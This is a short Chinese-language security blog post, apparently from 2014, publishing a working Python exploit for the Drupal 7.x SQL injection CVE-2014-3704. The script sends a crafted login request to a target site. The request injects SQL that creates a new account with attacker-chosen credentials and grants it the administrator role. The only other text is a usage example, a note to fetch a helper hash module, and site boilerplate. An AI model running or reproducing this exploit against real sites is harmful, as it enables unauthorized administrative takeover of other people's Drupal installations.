Drupal 7.x SQL Injection exp (CVE-2014-3704)

import urllib2,sys 
from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py 
if len(sys.argv) != 4: 
    print "" 
    print "python 7.xSQL.py  http://xxoo.com/drupal admin 123456" 
    print "" 
    sys.exit(1) 
host = sys.argv[1] 
user = sys.argv[2] 
password = sys.argv[3] 
hash = DrupalHash("$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML", password).get_hash() 
target = '%s/?q=node&destination=node' % host 
insert_user = "name[0%20;set+@a%3d%28SELECT+MAX%28uid%29+FROM+users%29%2b1;INSERT+INTO+users+set+uid%3d@a,status%3d1,name%3d'"  
            +user  
            +"'+,+pass+%3d+'"  
            +hash[:55]  
            +"';INSERT+INTO+users_roles+set+uid%3d@a,rid%3d3;;#%20%20]=bob&name[0]=larry&pass=lol&form_build_id=&form_id=user_login_block&op=Log+in" 
#print insert_user 
content = urllib2.urlopen(url=target, data=insert_user).read() 
if "mb_strlen() expects parameter 1" in content: 
        print "Success!nLogin now with user:%s and pass:%s" % (user, password)

下载https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py 放到同目录即可。

本文固定链接: https://www.unhonker.com/bug/1666.html | 90' s Blog|关注网络信息安全

该日志由 unhonker 于2014年10月17日发表在 漏洞公布 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: Drupal 7.x SQL Injection exp (CVE-2014-3704) | 90' s Blog|关注网络信息安全
关键字:

Drupal 7.x SQL Injection exp (CVE-2014-3704):等您坐沙发呢!

发表评论

您必须 [ 登录 ] 才能发表留言!